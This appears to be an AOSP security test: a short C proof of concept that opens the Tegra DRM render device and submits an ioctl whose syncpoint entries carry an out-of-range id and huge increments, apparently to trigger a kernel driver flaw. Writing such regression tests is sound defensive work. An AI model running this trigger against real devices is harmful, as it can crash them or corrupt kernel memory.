1 /* 2 * Copyright (C) 2017 The Android Open Source Project 3 * 4 * Licensed under the Apache License, Version 2.0 (the "License"); 5 * you may not use this file except in compliance with the License. 6 * You may obtain a copy of the License at 7 * 8 * http://www.apache.org/licenses/LICENSE-2.0 9 * 10 * Unless required by applicable law or agreed to in writing, software 11 * distributed under the License is distributed on an "AS IS" BASIS, 12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 * See the License for the specific language governing permissions and 14 * limitations under the License. 15 */ 16 #define _GNU_SOURCE 17 #include <string.h> 18 #include <stdio.h> 19 #include <stdlib.h> 20 #include <sys/ioctl.h> 21 #include <errno.h> 22 #include <sys/stat.h> 23 #include <fcntl.h> 24 #include <sys/types.h> 25 #include <unistd.h> 26 #include <sys/syscall.h> 27 28 #include "local_pwn.h" 29 30 #define DEV "/dev/dri/renderD129" 31 #define SYN_NUM 64 32 33 struct drm_tegra_open_channel open_c = { 0 }; 34 struct drm_tegra_submit submit_c = { 0 }; 35 struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 }; 36 37 int main() 38 { 39 int ret; 40 int dev_fd; 41 int i; 42 43 /* open dev */ 44 dev_fd = open(DEV,O_RDONLY); 45 if(dev_fd == -1){ 46 printf("[-] open dev failed %d %s\n", errno, strerror(errno)); 47 return 0; 48 } 49 50 /* prepare for ioctl */ 51 open_c.client = HOST1X_CLASS_VIC; 52 submit_c.num_syncpts = SYN_NUM; 53 submit_c.syncpts = (__u64)syncpts; 54 55 for(i = 1; i < SYN_NUM; i++){ 56 syncpts[i].id = 192; 57 syncpts[i].incrs = 0xffff; 58 } 59 60 /* open channel */ 61 ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c); 62 if(ret == -1){ 63 printf("[-] open_channel failed %d %s\n", errno, strerror(errno)); 64 goto out_dev; 65 } 66 submit_c.context = open_c.context; 67 printf("[+] call submit\n"); 68 ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c); 69 printf("[+] submit return %d\n", ret); 70 71 out_dev: 72 close(dev_fd); 73 return 0; 74 } 75
